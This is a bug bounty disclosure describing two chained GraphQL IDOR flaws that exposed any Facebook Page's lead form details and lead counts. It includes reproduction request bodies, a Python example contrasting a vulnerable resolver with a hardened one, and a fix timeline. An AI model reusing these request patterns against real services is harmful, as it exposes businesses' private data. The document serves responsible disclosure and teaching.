GraphQL IDOR: Disclose Leads Form Details of Any Facebook Business Account or Page (Bug Bounty)

Amine Aboud
May 22, 2021

By chaining two GraphQL IDOR vulnerabilities affecting the Facebook Leads Center, a malicious actor could have exposed the leads form details of any victim Facebook Page or Business Account.

Impact:

Advertisers invest significant resources in optimizing their lead generation campaigns, conducting numerous A/B tests to identify the most effective advertisements. If the specifics of these lead forms and the total number of leads obtained via paid ads were disclosed, it could enable malicious competitors to covertly monitor a targeted Facebook Page. Such competitors could then replicate successful lead ads, effectively hijacking profitable strategies without spending any money on advertising themselves.

Description of Facebook Lead Ads

“Lots of people want to hear from your business, but filling in forms can be difficult on mobile. Facebook lead ads makes the lead generation process easy. People can simply tap your ad and a form pops up — it’s already pre-populated with their Facebook contact information and ready to be sent directly to you. With just a few taps, they can get the information they want, and you generate a qualified lead for your business” — Facebook.com

Steps to Reproduce:

1) First GraphQL IDOR

Send a POST request to https://www.facebook.com/api/graphql/ with required CSRF parameters and the following parameters in the request body:

&variables={"pageID":"X"}&doc_id=3388026827877743

Where X is the targeted Facebook Page ID.

The returned response will disclose the leads form details of the targeted Facebook Page.

2) Second GraphQL IDOR

Send a POST request to https://www.facebook.com/api/graphql/ with required CSRF parameters and the following additional parameters in the request body:

&variables={"pageID":"X","start_time":null,"end_time":null,"reminder_start_time":1610481600,"reminder_end_time":1610568000,"stage_id":null,"owner_id":null,"form_id":"X","label_id":null,"name_search_term":null,"answer_search_term":null,"email_search_term":null,"notes_search_term":null,"phone_search_term":null,"adgroup_id":null,"campaign_id":null,"campaign_group_id":null,"pageSize":20,"expiring_type":null,"is_unread":false}&doc_id=3547538925278909

Where X is the Facebook Page ID and form_id is the targeted leads form ID leaked by the first GraphQL IDOR vulnerability.

The returned response will display the total number of leads captured through paid advertising by the targeted Facebook Page.
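Both requests above fail the same way: the resolver trusts the client-supplied pageID (and, in the second case, form_id) without checking that the caller holds a role on that Page. The following is an added illustration, not the author's or Facebook's code, that models the two resolvers in plain Python with the missing object-level authorization check; the Page IDs, form IDs, account names and role table are constructed.

```python
"""Object-level authorization for the two lead-form resolvers.

Constructed example: PAGE_ADMINS and LEAD_FORMS stand in for the real
role and lead-form stores, and the account names are hypothetical.
"""


class Forbidden(Exception):
    """Raised when the viewer may not read the requested object."""


# Constructed sample data: who administers which Page, and which
# lead forms (with their paid-lead counts) belong to which Page.
PAGE_ADMINS = {"page-100": {"alice"}, "page-200": {"bob"}}
LEAD_FORMS = {
    "form-1": {"page_id": "page-100", "name": "Spring promo", "leads": 412},
    "form-2": {"page_id": "page-200", "name": "Demo request", "leads": 37},
}


def is_page_admin(viewer: str, page_id: str) -> bool:
    return viewer in PAGE_ADMINS.get(page_id, set())


def lead_forms_vulnerable(viewer: str, page_id: str) -> list[dict]:
    # IDOR: the viewer is ignored, so any pageID value returns that
    # Page's forms. This mirrors the first finding in the write-up.
    return [{"id": fid, "name": f["name"]}
            for fid, f in LEAD_FORMS.items() if f["page_id"] == page_id]


def lead_forms(viewer: str, page_id: str) -> list[dict]:
    # Hardened: authorize the viewer against the object the variable names
    # before touching the data.
    if not is_page_admin(viewer, page_id):
        raise Forbidden(f"{viewer} has no role on {page_id}")
    return lead_forms_vulnerable(viewer, page_id)


def lead_count(viewer: str, page_id: str, form_id: str) -> int:
    # The second resolver takes two IDs. Authorizing pageID alone is not
    # enough: form_id must also belong to that same Page, otherwise an
    # authorized caller could read another Page's form by swapping the ID.
    if not is_page_admin(viewer, page_id):
        raise Forbidden(f"{viewer} has no role on {page_id}")
    form = LEAD_FORMS.get(form_id)
    if form is None or form["page_id"] != page_id:
        raise Forbidden(f"{form_id} does not belong to {page_id}")
    return form["leads"]


def is_forbidden(fn, *args) -> bool:
    """Helper: True if the call is rejected with Forbidden."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False
```

The vulnerable resolver hands a stranger the same list the owner sees; the hardened pair rejects both a foreign viewer and a form_id from a different Page.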

Timeline

January 5, 2021: Report Sent
January 6, 2021: Acknowledged by Facebook
January 13, 2021: Fixed by Facebook
January 13, 2021: I added a new vulnerable GraphQL request to the report
January 15, 2021: Fixed by Facebook
January 15, 2021: I added another vulnerable GraphQL request to the report
January 21, 2021: Fixed by Facebook
February 1, 2021: Bounty awarded 💰

Twitter: https://twitter.com/amineaboud
